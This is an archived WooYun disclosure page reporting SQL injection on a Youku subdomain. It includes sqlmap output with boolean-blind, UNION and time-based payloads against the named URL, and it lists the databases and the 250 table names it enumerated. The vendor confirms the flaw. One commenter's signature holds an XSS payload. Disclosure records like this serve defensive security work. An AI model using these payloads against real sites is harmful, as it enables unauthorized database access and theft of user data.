当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083661

漏洞标题:优酷分站SQL注入

相关厂商:优酷

漏洞作者: U神

提交时间:2014-11-17 22:29

修复时间:2015-01-01 22:30

公开时间:2015-01-01 22:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-17: 细节已通知厂商并且等待厂商处理中
2014-11-18: 厂商已经确认,细节仅向厂商公开
2014-11-28: 细节向核心白帽子及相关领域专家公开
2014-12-08: 细节向普通白帽子公开
2014-12-18: 细节向实习白帽子公开
2015-01-01: 细节向公众公开

简要描述:

详细说明:

http://hvsop.youku.com/list.php?music=1


09.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: music
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: music=1' AND 7821=7821 AND 'IbzW'='IbzW
    Type: UNION query
    Title: MySQL UNION query (NULL) - 15 columns
    Payload: music=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,C
ONCAT(0x7178686571,0x496c4e6172726d6c4b7a,0x7166706a71),NULL,NULL,NULL,NULL,NULL
,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: music=1' AND SLEEP(5) AND 'fKmP'='fKmP
---
[22:00:42] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[22:00:42] [INFO] fetching database names
available databases [3]:
[*] db_events
[*] information_schema
[*] test
[22:00:42] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\hvsop.youku.com'

漏洞证明:

Database: db_events
[250 tables]
+--------------------------+
| 7up_user                 |
| adidas_2010_football     |
| adidas_2011_tvc_info     |
| adidas_comments          |
| aveo_clicks              |
| aveo_comments            |
| aveo_users               |
| background_users         |
| bosideng_1024_users      |
| bosideng_code            |
| bosideng_fake_users      |
| bosideng_photos          |
| bosideng_users           |
| bosideng_video_vote_logs |
| bosideng_videos          |
| bosideng_vote_logs       |
| bsd_kpi_email            |
| bsd_kpi_user             |
| bsd_rt_log               |
| bsd_user                 |
| bugles_videos            |
| casesharing_2013         |
| cgirl2014_awards         |
| cgirl_images             |
| cgirl_users              |
| cgirl_videos             |
| chengxin_news            |
| chery_comments           |
| chery_photo_vote_logs    |
| chery_photos             |
| chery_users              |
| chery_video_vote_logs    |
| chery_videos             |
| cityshow_comment         |
| cityshow_data            |
| cityshow_member          |
| clear_game_log           |
| clear_log                |
| clear_rt_log             |
| clear_users              |
| crowneplaza_register     |
| cruze_images             |
| cruze_users              |
| cruze_videos             |
| deyi_tickets_users       |
| dove2014_erweima         |
| dove2014_videos          |
| dove_user                |
| dove_video               |
| dumex_videos             |
| etam_comment             |
| etam_txt                 |
| fiesta_2011_guestbook    |
| fm_dream                 |
| fm_kpi_member            |
| fm_number                |
| fm_number_bak            |
| fm_number_t              |
| fm_number_test           |
| fm_support_log           |
| fm_user                  |
| fm_vote_log              |
| fm_work                  |
| ford_users               |
| global_accounts          |
| global_china             |
| global_files             |
| global_minisites         |
| global_testing           |
| global_units             |
| greetingcard_params      |
| gucci_comments           |
| gucci_rt_logs            |
| gucci_users              |
| hkdl_users               |
| ht_config                |
| ht_guest                 |
| ht_user                  |
| htc_config               |
| hvsop2013_awards         |
| hvsop2014_20             |
| hvsop2014_users          |
| hvsop_comments           |
| hvsop_live_email         |
| hvsop_resumes            |
| hvsop_users              |
| hvsop_videos             |
| hvsop_vote_logs          |
| icedew_videos            |
| jasmine_comments         |
| jw2ask_marked            |
| jw2ask_plans             |
| jw2ask_questions         |
| jw2ask_same_q            |
| jw2ask_top30_grade_logs  |
| kohler_comments          |
| kohler_mm_awards         |
| kohler_photo_vote_logs   |
| kohler_photos            |
| kohler_prize_logs        |
| kohler_users             |
| kohler_video_vote_logs   |
| kohler_videos            |
| lancome_datas            |
| lancome_infos            |
| lancome_users            |
| lee_moment_photos        |
| lee_moment_votelog       |
| levis_data               |
| levis_logs               |
| levis_win                |
| loreal_flash_ad          |
| mabelline_users          |
| mamonde_2013_videos      |
| market_huanzhu_votes     |
| marketing_apply_info     |
| marketing_darenxiu       |
| marketing_fashion        |
| marketing_jianjiancao    |
| marketing_kfc_avatar     |
| marketing_kfc_cms        |
| marketing_laifushi       |
| marketing_upload_info    |
| mmd_datas                |
| mql_award                |
| mql_seckill              |
| mql_seckill_bak          |
| mql_seckill_log          |
| nfsq_users               |
| nikegz_comments          |
| nikegz_image             |
| nikegz_pks               |
| nikegz_videos            |
| nivea_answer_logs        |
| nivea_awards             |
| nivea_final_awards       |
| nivea_photos             |
| nivea_question           |
| nivea_users              |
| nivea_vote_logs          |
| onstar_regist            |
| onstar_video             |
| oreo_images              |
| oreo_videos              |
| pepsi_comments           |
| pepsi_ecards             |
| pepsi_media              |
| pepsi_users              |
| pepsi_videos             |
| pepsi_vote_logs          |
| pepsicny_videos          |
| qingyang_comment         |
| qingyang_videos          |
| remyvsop_banner          |
| remyvsop_comment         |
| remyvsop_mobile          |
| remyvsop_news            |
| remyvsop_register        |
| remyvsop_teams           |
| remyvsop_videos          |
| ricola_pincode           |
| ricola_tickets           |
| roewe_comment            |
| roewe_config             |
| roewe_guess              |
| roewe_player             |
| roewe_user               |
| scj_users                |
| sprite_users             |
| sprite_videos            |
| superb_comments          |
| superb_comments_bak      |
| superb_videos            |
| sww_2011_users           |
| sww_2011_videos          |
| unit_cachedata           |
| unit_comments            |
| unit_misc                |
| unit_news                |
| unit_users               |
| unit_videos              |
| unit_visitors            |
| unit_voting              |
| vichy2013_awards         |
| vichy2013_winners        |
| vsop_email               |
| vsop_live_mobile         |
| vsop_loop_videos         |
| vsop_lyp                 |
| vsop_users               |
| vsop_videos              |
| vsop_vote_email          |
| wtcc_2011_guestbook      |
| wtcc_2011_shots          |
| wtcc_2011_users          |
| wzmt_awards              |
| wzmt_awards_bak          |
| wzmt_seckill             |
| wzmt_seckill_log         |
| z_acer_user              |
| z_bwnzb_user             |
| z_eleven_user            |
| z_fanta                  |
| z_fanta_email            |
| z_ferrari                |
| z_ferrero_user           |
| z_huggies                |
| z_huggies_comments       |
| z_k3                     |
| z_k3_user                |
| z_k3_v                   |
| z_lenscrafter_pic        |
| z_lenscrafter_user       |
| z_loreal                 |
| z_market_disney          |
| z_market_topchef         |
| z_proya2011_100          |
| z_proya2011_code         |
| z_proya2011_mblog        |
| z_proya2011_pic          |
| z_proya2011_user         |
| z_proya2011_v2_pic       |
| z_proya2011_v2_user      |
| z_proya_pic              |
| z_proya_user             |
| z_remyclub_comment       |
| z_remyclub_user          |
| z_riich_user             |
| z_sdeer_user             |
| z_sepb_user              |
| z_sgm15th                |
| z_volvo                  |
| z_wp_code                |
| z_young                  |
| z_z_comment              |
| z_z_contact              |
| z_z_contact2             |
| z_z_email                |
| z_z_img                  |
| z_z_luck                 |
| z_z_module_luck          |
| z_z_p                    |
| z_z_txt                  |
| z_z_txt_vote             |
| z_z_v                    |
| z_z_vote                 |
| z_z_vote_id              |
| z_z_vote_ip              |
| zhijue_users             |
| zqbb_videos              |
+--------------------------+

修复方案:

我就跑到表,不深入了,修复吧,谢谢~好几天没rank了能来点不?

版权声明:转载请注明来源 U神@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-11-18 08:46

厂商回复:

多谢提醒,马上修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-11-18 02:05 | ki11y0u ( 普通白帽子 | Rank:104 漏洞数:23 | 好好学习,求带飞~~~~~~~~~~~~~~~~~~~~~~...)

    前排~~~

  2. 2014-11-18 08:52 | backtrack丶yao ( 普通白帽子 | Rank:290 漏洞数:107 | "><img src=x onerror=alert(666666);> <im...)

    此号被社 by:U神

  3. 2014-11-19 09:56 | Aepl│恋爱 ( 实习白帽子 | Rank:45 漏洞数:15 | Forzen恋爱-不要做你的Guest 只想做的你adm...)

    你关注的白帽子 U神 发表了漏洞 宜信某重要分站命令执行(可内网渗透) 2014-11-18你关注的白帽子 U神 发表了漏洞 优酷分站SQL注入 2014-11-17你关注的白帽子 U神 发表了漏洞 东方航空分站命令执行 2014-11-17